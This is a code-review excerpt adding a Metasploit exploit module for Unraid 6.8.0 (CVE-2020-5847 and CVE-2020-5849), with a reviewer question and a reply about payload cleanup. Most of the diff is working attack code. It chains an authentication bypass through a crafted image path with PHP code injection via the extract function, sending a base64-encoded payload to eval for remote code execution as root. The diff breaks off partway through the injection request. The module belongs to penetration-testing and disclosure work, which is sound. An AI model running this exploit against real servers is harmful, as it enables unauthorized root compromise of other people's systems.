modules/exploits/linux/http/unraid_eval.rb

```diff
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Unraid 6.8.0 Remote Code Execution',
+        'Description' => %q(
+          This module exploits two vulnerabilities affecting Unraid 6.8.0.
+          An authenticated bypass is used to gain access to the administrative
+          interface, and an insecure use of the extract PHP function can be abused
+          for arbitrary code execution as root.
+        ),
+        'Author'      =>
+          [
+            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
+          ],
+        'References'  =>
+          [
+            [ 'CVE', '2020-5847' ],
+            [ 'CVE', '2020-5849' ],
+            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
+            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['php'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_PHP,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Feb 10 2020'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+        'method'    => 'GET',
+      )
+      if res && res.code == 200
+        vprint_good('Authentication bypass is working')
+      else
+        Exploit::CheckCode::Safe
+      end
+      /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body
+
+      if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+      vprint_status('Sending exploit code')
+      send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+        'method'    => 'GET',
+        'encode_params' => false,
+        'vars_get'  =>
+        {
+          'path'    => 'x',
+          'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
```

Comment:
I had a quick read over the advisory. It is not clear to me if payload is stored anywhere. It looks like it's dynamically evaluated. If this module leaves artifacts on disk or in the database, these should be cleaned up, if possible.

Reply:
Hi @bcoles , the payload is indeed dynamically evaluated, no need for cleanup.